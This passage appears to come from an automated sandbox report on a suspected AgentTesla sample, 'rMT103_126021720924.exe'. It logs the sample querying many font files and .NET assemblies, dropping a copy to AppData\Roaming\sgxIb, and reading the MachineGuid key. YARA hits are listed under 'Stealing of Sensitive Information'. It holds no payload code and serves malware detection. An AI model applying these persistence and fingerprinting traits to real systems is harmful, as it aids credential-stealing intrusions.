                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\OFFSYML.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\OFFSYMB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Users\user\Desktop\rMT103_126021720924.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 0.2.rMT103_126021720924.exe.48269a0.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.sgxIb.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.rMT103_126021720924.exe.48269a0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.rMT103_126021720924.exe.472a160.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.rMT103_126021720924.exe.47a8580.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000B.00000002.4171800763.000000000285C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.1923594429.0000000002A1C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4171996023.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4171996023.0000000002B9C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
